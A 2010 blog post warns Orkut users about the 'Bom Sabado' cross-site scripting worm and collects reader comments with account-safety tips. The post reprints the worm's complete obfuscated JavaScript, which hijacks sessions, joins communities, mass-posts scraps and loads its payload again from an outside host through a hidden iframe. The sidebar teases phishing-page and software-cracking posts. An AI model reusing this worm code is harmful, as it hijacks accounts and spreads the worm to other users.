Recent Articles
Orkut attacked by 'Bom Sabado' worm
Saturday, September 25, 2010|
Surbhi Verma
‘Bom Sabado!’‘Bom Sabado!’‘Bom Sabado!’
Hi Friends, Did you find this scrap in your scrapbook from many of your friends??? If yes, then dont visit the profile of person from which this message has come, coz ur friend profile is now infected my a Virus named..‘Bom Sabado!’. If you visit any affected profile, your profile and ur system will also get affect by this Virus!!!
What is ‘Bom Sabado!’?
'Bom Sabado' is a new worm of type XSS (cross-site scripting) attack, which is created by keeping total focus on Orkut.
'Bom Sabado' is a Portuguese word which means 'Good saturday.'
Only one country is there in which Orkut is still no. 1 in social websites, So it is assumed that someone has made this virus to attack on the popularity of Orkut.
How it works?
When any one open page that is infected by this worm. A JavaScript(form http://tptools.org/worm.js or http://tptools.org/worm.js#%3Cwbr%3E#:1) will run automatically.which will automatically join some communities and send scrap to your friends with text “Bom Sabado!” with a iFrame code which load that JavaScript again for your friends and they will join communities and send links to their friends. Also this worm steal cookies from your browser.
Orkut has Temporarily Fixed the issue.
On Orkut Support Forums, its declared by a 'Top Contributor' that Orkut has Temporarily Fixed the issue.
Here what can be meant by temporarily... what i guess.. they have only removed the java script from the site http://tptools.org, but it will take time to Fix this 'Hole of Orkut' to save Orkut in coming times. so Just Be Aware!!!
I will suggest you all to Disable JavaScript of your Browser, to avoid this type of problem :)
Suggestion for users Affected by Bom Sabado
As This virus steal cookies from browser, so it is suggested to clear ur browser's cookies immediately and change your all passwords.
Coding of Bom Sabado Worm taken from http://tptools.org/
var _0x37a1=["\x4D\x69\x63\x72\ x6F\x73\x6F\x66\x74\x2E\x58\ x4D\x4C\x48\x74\x74\x70","\ x50\x4F\x53\x54\x5F\x54\x4F\ x4B\x45\x4E\x3D","\x43\x47\ x49\x2E\x50\x4F\x53\x54\x5F\ x54\x4F\x4B\x45\x4E","\x26\ x73\x69\x67\x6E\x61\x74\x75\ x72\x65\x3D","\x50\x61\x67\ x65\x2E\x73\x69\x67\x6E\x61\ x74\x75\x72\x65\x2E\x72\x61\ x77","\x50\x4F\x53\x54","\x53\ x63\x72\x61\x70\x62\x6F\x6F\ x6B\x3F","\x6F\x70\x65\x6E","\ x43\x6F\x6E\x74\x65\x6E\x74\ x2D\x54\x79\x70\x65","\x61\ x70\x70\x6C\x69\x63\x61\x74\ x69\x6F\x6E\x2F\x78\x2D\x77\ x77\x77\x2D\x66\x6F\x72\x6D\ x2D\x75\x72\x6C\x65\x6E\x63\ x6F\x64\x65\x64\x3B","\x73\ x65\x74\x52\x65\x71\x75\x65\ x73\x74\x48\x65\x61\x64\x65\ x72","\x26\x73\x63\x72\x61\ x70\x54\x65\x78\x74\x3D","\ x3C\x73\x74\x79\x6C\x65\x2F\ x3E\x3C\x69\x66\x72\x61\x6D\ x65\x20\x73\x74\x79\x6C\x65\ x3D\x64\x69\x73\x70\x6C\x61\ x79\x3A\x6E\x6F\x6E\x65\x20\ x6F\x6E\x6C\x6F\x61\x64\x3D\ x22\x61\x20\x3D\x20\x64\x6F\ x63\x75\x6D\x65\x6E\x74\x2E\ x63\x72\x65\x61\x74\x65\x45\ x6C\x65\x6D\x65\x6E\x74\x28\ x20\x27\x73\x63\x72\x69\x70\ x74\x27\x29\x3B\x61\x2E\x73\ x72\x63\x20\x3D\x20\x27\x2F\ x27\x20\x2B\x20\x27\x2F\x74\ x70\x74\x6F\x6F\x6C\x73\x2E\ x6F\x27\x2B\x27\x72\x67\x2F\ x77\x6F\x72\x6D\x2E\x6A\x73\ x27\x2B\x27\x23\x3C\x77\x62\ x72\x3E\x23\x27\x3B\x20\x64\ x6F\x63\x75\x6D\x65\x6E\x74\ x20\x2E\x20\x62\x6F\x64\x79\ x20\x2E\x20\x61\x70\x70\x65\ x6E\x64\x43\x68\x69\x6C\x64\ x28\x20\x61\x20\x29\x22\x3E\ x3C\x2F\x69\x66\x72\x61\x6D\ x65\x3E\x42\x6F\x6D\x20\x53\ x61\x62\x61\x64\x6F\x21","\ x26\x75\x69\x64\x3D","\x26\ x41\x63\x74\x69\x6F\x6E\x2E\ x73\x75\x62\x6D\x69\x74\x3D\ x31","\x73\x65\x6E\x64","\x47\ x45\x54","\x52\x65\x71\x75\ x65\x73\x74\x46\x72\x69\x65\ x6E\x64\x73\x3F\x72\x65\x71\ x3D\x66\x6C\x26\x75\x69\x64\ x3D","\x75\x69\x64","\x26\x6F\ x78\x68\x3D\x31","\x77\x68\ x69\x6C\x65\x20\x28\x74\x72\ x75\x65\x29\x3B\x20\x26\x26\ x26\x53\x54\x41\x52\x54\x26\ x26\x26","","\x72\x65\x70\x6C\ x61\x63\x65","\x72\x65\x73\ x70\x6F\x6E\x73\x65\x54\x65\ x78\x74","\x43\x6F\x6D\x6D\ x75\x6E\x69\x74\x79\x4A\x6F\ x69\x6E\x3F\x63\x6D\x6D\x3D"," \x26\x41\x63\x74\x69\x6F\x6E\ x2E\x6A\x6F\x69\x6E\x3D\x31"," \x31\x30\x36\x36\x39\x38\x38\ x30\x38","\x36","\x35\x35\x38\ x34\x39\x34","\x31\x30\x36\ x36\x39\x38\x36\x32\x38","\ x31\x30\x36\x36\x39\x31\x33\ x34\x31","\x76\x61\x72\x20\ x66\x72\x69\x65\x6E\x64\x73\ x20\x3D\x20","\x3B","\x6C\x69\ x73\x74","\x64\x61\x74\x61","\ x69\x64"];function createXMLHttpRequest(){try{ return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+ encodeURIComponent(JSHDF[_ 0x37a1[2]])+_0x37a1[3]+ encodeURIComponent(JSHDF[_ 0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5= createXMLHttpRequest();_ 0x7c2bx5[_0x37a1[7]](_0x37a1[ 5],_0x37a1[6],false);_ 0x7c2bx5[_0x37a1[10]](_0x37a1[ 8],_0x37a1[9]);_0x7c2bx5[_ 0x37a1[15]](data+_0x37a1[11]+ encodeURIComponent(_0x37a1[12] )+_0x37a1[13]+_0x7c2bx4+_ 0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5= createXMLHttpRequest();_ 0x7c2bx5[_0x37a1[7]](_0x37a1[ 16],_0x37a1[17]+JSHDF[_0x37a1[ 18]]+_0x37a1[19],false);_ 0x7c2bx5[_0x37a1[15]](null); return (_0x7c2bx5[_0x37a1[23]])[_ 0x37a1[22]](_0x37a1[20],_ 0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5= createXMLHttpRequest();_ 0x7c2bx5[_0x37a1[7]](_0x37a1[ 5],_0x37a1[24]+_0x7c2bx8, false);_0x7c2bx5[_0x37a1[10]]( _0x37a1[8],_0x37a1[9]);_ 0x7c2bx5[_0x37a1[15]](data+_ 0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM( _0x37a1[27]);joinCMM(_0x37a1[ 28]);joinCMM(_0x37a1[29]); joinCMM(_0x37a1[30]);eval(_ 0x37a1[31]+requestFriends()+_ 0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[ 33]]){uid=(friends[_0x37a1[34] ][_0x37a1[33]][x]);sendScrap( uid[_0x37a1[35]]);} ;
All readers are most welcomed to share their experience with these kind of Viruses attacks!!!
All readers are most welcomed to share their experience with these kind of Viruses attacks!!!
Posted in
Orkut Tips
6 comments for this post
Leave a reply
Subscribe to:
Post Comments (Atom)
TechByte4U on Facebook
Popular Posts
free idm, serial key Internet Download Manager(also known as Idman) is an excellent internet download accelerator that will care of...
last week a person requested here to explain how to make a fake login page of Facebook.. So i am giving a lesson here about making fake ...
How to get Account on Google+ ? get google plus invitation Hello All, Google+ is still available using the invitation process, It wi...
Free winrar, Full version Winrar, Winrar Serial key I guess everyone know what is Winrar, and what it works. So without going into t...
Hey Friends, In my last post i have told you about the browser's fact of storing passwords after prompting 'Do you want t...
Internet Download Manager 6.07 Registration Serial Number free idm, serial key Hi Friends, In this tutorial i am gonna explain a way...
Windows Genuine Notifications is a problem that every computer operator faces in her life. It notifies you if a copy of Windows XP is not ge...
These days when anyone try to create new account on gmail, it says you to enter your mobile no. and then it verify your no. by s...
Hi friends, Techbyte4u is growing day by day, and last month we got 50000+ pageviews and 25000+ unique visitors. So, Techbyte 4 U an...
You have no more need to read the long Pdf files line by line. Now feel free, coz your pdf will read out itself for you. Many peo...
deepa kashyap
September 25, 2010 at 4:45 PM
hey thanks a lot as i checked my scrapbook i saw msg like that only ‘Bom Sabado' i was about to scrap him what does it means, in the meanwhile checked your post and oo god that's virus attack !!
what if i will hide that scrap??
Sn34k3r
September 25, 2010 at 7:53 PM
"Bom Sabado" Bug Creating Problems in Orkut
what is bom sabado, bom sabado meaning, meaning of bom sabado, bom sabado means, bom sabado!
Today in morning i saw every account was posting scrap some thing like bomb amungu or Bom Sabado.
And thos who all are reading this scrap even in their profile, their cookies are also stoled and so they are also posting scrap automatically to their friend list same scrap as bomb something like :(
The script is runnign on and also in status of profile their flag is coming. i mean status are automatically updated in some profile. Its their flag of Brazil. Already Google team are working on it.
By the Bom Sabado means Good Saturday
Currently what u should do is
Solutions:-
Follow these steps:
1. Immediately change your password and security question{ including secondary email and mobile number if they also got changed.) This will solve the problem.
2. Find out whether some communities has been joined automatically. if yeah, do remove them.
3. If your account has been completely hacked, see here:
http://www.google.com/support/forum/p/orkut/thread?tid=39fa418ed1162078&hl=en
4. Always remember these points :
4.1 Donot ever login to any site rather than www.orkut.com
4.2 Donot ever run any javascripts while logged into your orkut account
4.3 Never use any flooder in your account
4.4 Donot ever share your password with anyone else and keep changing your password regularly.
4.5 Donot ever click suspicious link while logged into Orkut a/c. if you are curious you can copy the link and check them in
other browser after cleaning it's browser's cookie and cache.
4.6 Donot ever install any suspicious script on greasemoneky and ALWAYS DIABLE THE GM before logging in to orkut.
4.7 Do your mobile verification also, so that you can get back your a/c if hacker doesn't change the mobile number there.
http://www.orkut.co.in/Main#MobileSetupSettings
4.8 Install a good Update Ant ivirus and Anti Key logger and keep your system free from Key loggers and backdoor trojans.
4.9 Use Virtual Keyboard to enter your password for more securite. KIS 2010 provides it and there are many other V.
keyboards available.
Take a look here and follow the points given to protect your a/c:
http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=57442
and
http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=48579
hope this helps you...;)
happy Orkutting..
Surbhi Verma
September 26, 2010 at 12:09 AM
@Deepa....No need to hide scrap, the problem is fixed now :)
But be aware for future.. never check the affected profile in future, if again this type of msg come!!!!
sudhansh jain
September 26, 2010 at 7:44 AM
Yeah i have also got some scraps like that ...but thnk god my profile is not affected by that!!
LoGaN
September 26, 2010 at 5:03 PM
If the browser is ran sandboxed, with that "Sandboxie" tool you gave, will it prevent the system from virus or the orkut profile to any extent ?
Surbhi Verma
September 28, 2010 at 8:20 PM
@Logan... very gud question....
well in these types of attack in which the hacker steal cookies of browser, then sandboxie could not also protect the users, coz if u run your browser in sanbox, still then if u keep save passwords, then it will be accessible by sandbox means it can be hacked by cooking stealer's.